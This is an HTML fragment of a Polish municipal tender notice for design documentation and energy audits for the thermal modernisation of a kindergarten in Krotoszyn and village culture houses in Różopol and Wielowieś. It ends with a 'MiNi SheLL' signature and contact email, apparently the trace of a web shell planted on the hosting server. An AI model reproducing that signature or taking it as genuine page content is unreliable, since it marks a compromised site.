<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynku Przedszkola Nr 5 w Krotoszynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac projektowych : 1.   Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych i stropodachów,
-  wymiana  stolarki okiennej i drzwiowej, 
-  modernizacja systemu grzewczego - wymiana wewnętrznej,
   instalacji c.o. wraz z dostosowaniem instalacji kotłowni,
-  wentylacja budynku,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu. 
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów.
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.
5.Remont tarasu od strony placu zabaw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynku Wiejskiego Domu Kultury w Różopolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac projektowych : 1. Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych,  dachu i stropodachu,
-  wymiana  stolarki okiennej i drzwiowej, 
-  adaptacja pomieszczeń zaplecza na kotłownię,
-  wykonanie instalacji c.o. dla całego obiektu wraz z kotłem,
-  wentylacja budynku,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu 
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynku Wiejskiego Domu Kultury w Wielowsi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogolny zakres prac projektowych : 1.Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych, dachu i stropodachu,
-  wymiana  stolarki okiennej i drzwiowej, 
-  adaptacja pomieszczeń zaplecza na kotłownię,
-  wykonanie instalacji c.o. dla całego obiektu wraz z kotłem,
-  wentylacja budynku,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu 
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com